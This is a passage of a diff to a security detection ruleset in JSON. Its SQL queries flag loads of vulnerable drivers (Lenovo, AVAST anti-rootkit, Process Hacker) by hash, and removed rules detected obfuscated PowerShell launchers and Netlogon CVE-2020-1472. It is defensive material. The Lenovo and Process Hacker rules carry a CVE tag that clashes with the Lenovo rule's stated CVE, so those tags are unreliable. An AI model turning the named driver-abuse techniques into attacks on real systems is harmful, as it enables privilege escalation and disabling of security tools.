the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "New PDQDeploy Service - Client Side", - "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", "author": "Nasreddine Bencherchali (Nextron 
Systems)", "tags": [ "attack.privilege_escalation", "attack.t1543.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" ], - "filename": "win_system_service_install_pdqdeploy_runner.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "title": "Process Hacker and System Informer Driver Load", + "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the load of drivers used by Process Hacker and System Informer", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate user of process hacker or system informer by low level developers or system 
administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138')))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "driver_load_win_process_hacker.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable Driver Load", + "id": 
"7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "status": "experimental", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE '%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR 
Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE '%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' ESCAPE '\\' OR Hashes LIKE '%MD5=c3fea895fe95ea7a57d9f4d7abed5e71%' ESCAPE '\\' OR Hashes LIKE '%MD5=2128e6c044ee86f822d952a261af0b48%' ESCAPE '\\' OR Hashes LIKE '%MD5=3dbf69f935ea48571ea6b0f5a2878896%' ESCAPE '\\' OR Hashes LIKE '%MD5=c6f8983dd3d75640c072a8459b8fa55a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=79f7e6f98a5d3ab6601622be4471027f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bae1f127c4ff21d8fe45e2bbfc59c180%' ESCAPE '\\' OR Hashes LIKE '%MD5=c533d6d64b474ffc3169a0e0fc0a701a%' ESCAPE '\\' OR Hashes LIKE '%MD5=3f39f013168428c8e505a7b9e6cba8a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=748cf64b95ca83abc35762ad2c25458f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bce7f34912ff59a3926216b206deb09f%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d8e4f38b36c334d0a32a7324832501d%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=47e6ac52431ca47da17248d80bf71389%' ESCAPE '\\' OR Hashes LIKE '%MD5=3651a6990fe38711ebb285143f867a43%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc943bf367ae77016ae399df8e71d38a%' ESCAPE '\\' OR Hashes LIKE '%MD5=02198692732722681f246c1b33f7a9d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=ddc2ffe0ab3fcd48db898ab13c38d88d%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ec361f2fba49c73260af351c39ff9cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1fce7aac4e9dd7a730997e2979fa1e2%' ESCAPE '\\' OR Hashes LIKE '%MD5=49938383844ceec33dba794fb751c9a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=34069a15ae3aa0e879cd0d81708e4bcc%' ESCAPE '\\' OR Hashes LIKE '%MD5=1c294146fc77565030603878fd0106f9%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd81af62964f5dd5eb4a828543a33dcf%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd5b0514f3b40f139d8079138d01b5f6%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa173832dca1b1faeba095e5c82a1559%' ESCAPE '\\' OR Hashes LIKE '%MD5=5cc5c26fc99175997d84fe95c61ab2c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed043249c21ab201edccb37f1d40af9%' ESCAPE '\\' OR Hashes LIKE '%MD5=361a598d8bb92c13b18abb7cac850b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b359b722ac80c4e0a5235264e1e0156%' ESCAPE '\\' OR Hashes LIKE '%MD5=296bde4d0ed32c6069eb90c502187d0d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d3e40644a91327da2b1a7241606fe559%' ESCAPE '\\' OR Hashes LIKE '%MD5=12cecc3c14160f32b21279c1a36b8338%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd39a86852b498b891672ffbcd071c03%' ESCAPE '\\' OR Hashes LIKE '%MD5=b2a9ac0600b12ec9819e049d7a6a0b75%' ESCAPE '\\' OR Hashes LIKE '%MD5=444f538daa9f7b340cfd43974ed43690%' ESCAPE '\\' OR Hashes LIKE '%MD5=7b43dfd84de5e81162ebcfafb764b769%' ESCAPE '\\' OR Hashes LIKE '%MD5=13dda15ef67eb265869fc371c72d6ef0%' ESCAPE '\\' OR Hashes LIKE '%MD5=300c5b1795c9b6cc1bc4d7d55c7bbe85%' ESCAPE '\\' OR Hashes LIKE '%MD5=1392b92179b07b672720763d9b1028a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=2e1f8a2a80221deb93496a861693c565%' ESCAPE '\\' OR Hashes LIKE '%MD5=8065a7659562005127673ac52898675f%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=b5ada7fd226d20ec6634fc24768f9e22%' ESCAPE '\\' OR Hashes LIKE '%MD5=84fb76ee319073e77fb364bbbbff5461%' ESCAPE '\\' OR Hashes LIKE '%MD5=daf800da15b33bf1a84ee7afc59f0656%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7393fb917aed182e4cbef25ce8af950%' ESCAPE '\\' OR Hashes LIKE '%MD5=120b5bbb9d2eb35ff4f62d79507ea63a%' ESCAPE '\\' OR Hashes LIKE '%MD5=73c98438ac64a68e88b7b0afd11ba140%' ESCAPE '\\' OR Hashes LIKE '%MD5=51207adb8dab983332d6b22c29fe8129%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a23e0f2c6f926a41b28d574cbc6ac30%' ESCAPE '\\' OR Hashes LIKE '%MD5=20125794b807116617d43f02b616e092%' ESCAPE '\\' OR Hashes LIKE '%MD5=e8ebba56ea799e1e62748c59e1a4c586%' ESCAPE '\\' OR Hashes LIKE '%MD5=8abbb12e61045984eda19e2dc77b235e%' ESCAPE '\\' OR Hashes LIKE '%MD5=f66b96aa7ae430b56289409241645099%' ESCAPE '\\' OR Hashes LIKE '%MD5=97e3a44ec4ae58c8cc38eefc613e950e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ff7b31fa6e9ab923bce8af31d1be5bb2%' ESCAPE '\\' OR Hashes LIKE '%MD5=12908c285b9d68ee1f39186110df0f1e%' ESCAPE '\\' OR Hashes LIKE '%MD5=6126065af2fc2639473d12ee3c0c198e%' ESCAPE '\\' OR Hashes LIKE '%MD5=356bda2bf0f6899a2c08b2da3ec69f13%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd7de498a72b2daf89f321d23948c3c4%' ESCAPE '\\' OR Hashes LIKE '%MD5=338a98e1c27bc76f09331fcd7ae413a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=c9a293762319d73c8ee84bcaaf81b7b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=e9e786bdba458b8b4f9e93d034f73d00%' ESCAPE '\\' OR Hashes LIKE '%MD5=a17c58c0582ee560c72f60764ed63224%' ESCAPE '\\' OR Hashes LIKE '%MD5=21e13f2cb269defeae5e1d09887d47bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=a57b47489febc552515778dd0fd1e51c%' ESCAPE '\\' OR Hashes LIKE '%MD5=d6e9f6c67d9b3d790d592557a7d57c3c%' ESCAPE '\\' OR Hashes LIKE '%MD5=76bb1a4332666222a8e3e1339e267179%' ESCAPE '\\' OR Hashes LIKE '%MD5=1cd158a64f3d886357535382a6fdad75%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9e7e5bcc5b01915dbcef7762a7fc329%' ESCAPE '\\' OR Hashes LIKE '%MD5=d253c19194a18030296ae62a10821640%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=b12d1630fd50b2a21fd91e45d522ba3a%' ESCAPE '\\' OR Hashes LIKE '%MD5=50b39072d0ee9af5ef4824eca34be6e3%' ESCAPE '\\' OR Hashes LIKE '%MD5=778b7feea3c750d44745d3bf294bd4ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=0761c357aed5f591142edaefdf0c89c8%' ESCAPE '\\' OR Hashes LIKE '%MD5=23cf3da010497eb2bf39a5c5a57e437c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c49a1956a6a25ffc25ad97d6762b0989%' ESCAPE '\\' OR Hashes LIKE '%MD5=f406c5536bcf9bacbeb7ce8a3c383bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=f2f728d2f69765f5dfda913d407783d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b817d0e7714b9d43db43ae4a22a161e%' ESCAPE '\\' OR Hashes LIKE '%MD5=715f8efab1d1c660e4188055c4b28eed%' ESCAPE '\\' OR Hashes LIKE '%MD5=a01c412699b6f21645b2885c2bae4454%' ESCAPE '\\' OR Hashes LIKE '%MD5=010c0e5ac584e3ab97a2daf84cf436f5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5db81974ffda566fa821400419f59be%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014ba35d406475311a2eab0c4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d487f77be4471900d6ccbc47242cc25%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f2888e57fdd6aee466962c25ba7d62d%' ESCAPE '\\' OR Hashes LIKE '%MD5=507a649eb585d8d0447eab0532ef0c73%' ESCAPE '\\' OR Hashes LIKE '%MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11%' ESCAPE '\\' OR Hashes LIKE '%MD5=cd9f0fcecf1664facb3671c0130dc8bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=b10b210c5944965d0dc85e70a0b19a42%' ESCAPE '\\' OR Hashes LIKE '%MD5=ae5eb2759305402821aeddc52ba9a6d6%' ESCAPE '\\' OR Hashes LIKE '%MD5=f5051c756035ef5de9c4c48bacb0612b%' ESCAPE '\\' OR Hashes LIKE '%MD5=1898ceda3247213c084f43637ef163b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=37086ae5244442ba552803984a11d6cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=825703c494e0d270f797f1ecf070f698%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\' OR Hashes LIKE '%MD5=75d6c3469347de1cdfa3b1b9f1544208%' ESCAPE '\\' OR Hashes LIKE '%MD5=9ab9f3b75a2eb87fafb1b7361be9dfb3%' ESCAPE '\\' OR Hashes LIKE '%MD5=5f9785e7535f8f602cb294a54962c9e7%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=7d46d0ddaf8c7e1776a70c220bf47524%' ESCAPE '\\' OR Hashes LIKE '%MD5=f9844524fb0009e5b784c21c7bad4220%' ESCAPE '\\' OR Hashes LIKE '%MD5=828bb9cb1dd449cd65a29b18ec46055f%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d17b32be70ef39eae5d5edeb5e89877%' ESCAPE '\\' OR Hashes LIKE '%MD5=2391fb461b061d0e5fccb050d4af7941%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d4159694e1754f262e326b52a3b305a%' ESCAPE '\\' OR Hashes LIKE '%MD5=a60c9173563b940203cf4ad38ccf2082%' ESCAPE '\\' OR Hashes LIKE '%MD5=63e333d64a8716e1ae59f914cb686ae8%' ESCAPE '\\' OR Hashes LIKE '%MD5=a9f220b1507a3c9a327a99995ff99c82%' ESCAPE '\\' OR Hashes LIKE '%MD5=c5f5d109f11aadebae94c77b27cb026f%' ESCAPE '\\' OR Hashes LIKE '%MD5=5bab40019419a2713298a5c9173e5d30%' ESCAPE '\\' OR Hashes LIKE '%MD5=c996d7971c49252c582171d9380360f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=98763a3dee3cf03de334f00f95fc071a%' ESCAPE '\\' OR Hashes LIKE '%MD5=e79c91c27df3eaf82fb7bd1280172517%' ESCAPE '\\' OR Hashes LIKE '%MD5=a42249a046182aaaf3a7a7db98bfa69d%' ESCAPE '\\' OR Hashes LIKE '%MD5=803a371a78d528a44ef8777f67443b16%' ESCAPE '\\' OR Hashes LIKE '%MD5=9007c94c9d91ccff8d7f5d4cdddcc403%' ESCAPE '\\' OR Hashes LIKE '%MD5=11fb599312cb1cf43ca5e879ed6fb71e%' ESCAPE '\\' OR Hashes LIKE '%MD5=7f9309f5e4defec132b622fadbcad511%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=8636fe3724f2bcba9399daffd6ef3c7e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9dfd73dadb2f1c7e9c9d2542981aaa63%' ESCAPE '\\' OR Hashes LIKE '%MD5=490b1f404c4f31f4538b36736c990136%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1d063c9422a19944cdaa6714623f2ec%' ESCAPE '\\' OR Hashes LIKE '%MD5=dacb62578b3ea191ea37486d15f4f83c%' ESCAPE '\\' OR Hashes LIKE '%MD5=2da209dde8188076a9579bd256dc90d0%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ba6afe0ea182236f98365bd977adfdf%' ESCAPE '\\' OR Hashes LIKE '%MD5=4c016fd76ed5c05e84ca8cab77993961%' ESCAPE '\\' OR Hashes LIKE '%MD5=ad22a7b010de6f9c6f39c350a471a440%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=79483cb29a0c428e1362ec8642109eee%' ESCAPE '\\' OR Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%MD5=ccf523b951afaa0147f22e2a7aae4976%' ESCAPE '\\' OR Hashes LIKE '%MD5=736c4b85ce346ddf3b49b1e3abb4e72a%' ESCAPE '\\' OR Hashes LIKE '%MD5=b0baac4d6cbac384a633c71858b35a2e%' ESCAPE '\\' OR Hashes LIKE '%MD5=798de15f187c1f013095bbbeb6fb6197%' ESCAPE '\\' OR Hashes LIKE '%MD5=a86150f2e29b35369afa2cafd7aa9764%' ESCAPE '\\' OR Hashes LIKE '%MD5=b941c8364308990ee4cc6eadf7214e0f%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd04cd3de0c19bede84e9c95a86b3ca8%' ESCAPE '\\' OR Hashes LIKE '%MD5=6909b5e86e00b4033fedfca1775b0e33%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b91a44a488e4d539f2e55476b216024%' ESCAPE '\\' OR Hashes LIKE '%MD5=8b287636041792f640f92e77e560725e%' ESCAPE '\\' OR Hashes LIKE '%MD5=07f83829e7429e60298440cd1e601a6a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0395b4e0eb21693590ad1cfdf7044b8b%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b058945c9f2b8d8ebc485add1101ba5%' ESCAPE '\\' OR Hashes LIKE '%MD5=0067c788e1cb174f008c325ebde56c22%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2c1b8c00b99e913d992a870ed478a24%' ESCAPE '\\' OR Hashes LIKE '%MD5=84ba7af6ada1b3ea5efb9871a0613fc6%' ESCAPE '\\' OR Hashes LIKE '%MD5=dbc415304403be25ac83047c170b0ec2%' ESCAPE '\\' OR Hashes LIKE '%MD5=31469f1313871690e8dc2e8ee4799b22%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d465b4487dc81effaa84f122b71c24f%' ESCAPE '\\' OR Hashes LIKE '%MD5=64efbffaa153b0d53dc1bccda4279299%' ESCAPE '\\' OR Hashes LIKE '%MD5=b164daf106566f444dfb280d743bc2f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7c72a7e1d42b0790773efd8700e24952%' ESCAPE '\\' OR Hashes LIKE '%MD5=56a515173b211832e20fbc64e5a0447c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2eb4539a4f6ab6edd01bdc191619975%' ESCAPE '\\' OR Hashes LIKE '%MD5=d1bac75205c389d6d5d6418f0457c29b%' ESCAPE '\\' OR Hashes LIKE '%MD5=68dde686d6999ad2e5d182b20403240b%' ESCAPE '\\' OR Hashes LIKE '%MD5=a785b3bc4309d2eb111911c1b55e793f%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=6ab7b8ef0c44e7d2d5909fdb58d37fa5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9ce18960c23f38706ae9c6584d9ac90%' ESCAPE '\\' OR Hashes LIKE '%MD5=ab53d07f18a9697139ddc825b466f696%' ESCAPE '\\' OR Hashes LIKE '%MD5=ba5f0f6347780c2ed911bbf888e75bef%' ESCAPE '\\' OR Hashes LIKE '%MD5=13ee349c15ee5d6cf640b3d0111ffc0e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9a237fa07ce3ed06ea924a9bed4a6b99%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa222bed731713904320723b9c085b11%' ESCAPE '\\' OR Hashes LIKE '%MD5=0898af0888d8f7a9544ef56e5e16354e%' ESCAPE '\\' OR Hashes LIKE '%MD5=e076dadf37dd43a6b36aeed957abee9e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f27c09cc8680e06b04d6a9c34ca1e08%' ESCAPE '\\' OR Hashes LIKE '%MD5=1b32c54b95121ab1683c7b83b2db4b96%' 